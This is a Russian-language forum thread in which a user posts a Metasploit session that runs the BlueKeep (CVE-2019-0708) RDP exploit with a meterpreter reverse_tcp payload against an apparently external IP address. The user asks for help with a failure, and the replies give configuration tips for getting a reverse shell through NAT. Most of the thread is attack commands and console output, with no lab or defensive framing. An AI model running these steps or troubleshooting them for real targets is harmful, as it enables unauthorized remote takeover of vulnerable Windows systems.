![]() |
Проблемма с использованиемCVE-2019-0708
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 200.000.100.28 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit [*] Exploiting target 200.000.100.28 [*] Started reverse TCP handler on 192.168.1.114:4444 [*] 200.000.100.28:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check [+] 200.000.100.28:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. [*] 200.000.100.28:3389 - Scanned 1 of 1 hosts (100% complete) [*] Sending stage (206403 bytes) to 5.164.26.35 [COLOR="#ff0000"][SIZE="4"] [*] 200.000.100.28:3389 - Surfing channels ... [*] 200.000.100.28:3389 - Lobbing eggs ... [-] 200.000.100.28:3389 - Exploit failed: NameError undefined local variable or method `rdp_move_mouse' for # Может кто сталкивался, все перекопал не нашел похожей траблы. |
Покажи вывод "options"
|
[SIZE="1"]msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce): Name Current Setting Required Description ---- --------------- -------- ----------- RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random RDP_DOMAIN no The client domain name to report during connect RDP_USER no The username to report during connect, UNSET = random RHOSTS 200.100.100.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 3389 yes The target port (TCP) Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.109 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64) msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit [*] Started reverse TCP handler on 192.168.1.109:4444 [*] 200.100.100.100:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check [+] 200.100.100.100:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. [*] 200.100.100.100:3389 - Scanned 1 of 1 hosts (100% complete) [*] Sending stage (206403 bytes) to [COLOR="#ff0000"]5.164.26.35 |
[QUOTE="leikoz"]
leikoz said: ↑ Проблемма с использованием CVE-2019-0708[*] Sending stage (206403 bytes) to 5.164.26.35 [COLOR="#ff0000"][SIZE="4"] |
Цитата:
видео правильной работы |
Цитата:
LPORT Внешний порт. Потом укажите локальный порт и адрес через ReverseListenerBindAddress и ReverseListenerBindPort. Подробнее посмотреть: show advanced |
Цитата:
|
Цитата:
|
| Время: 20:56 |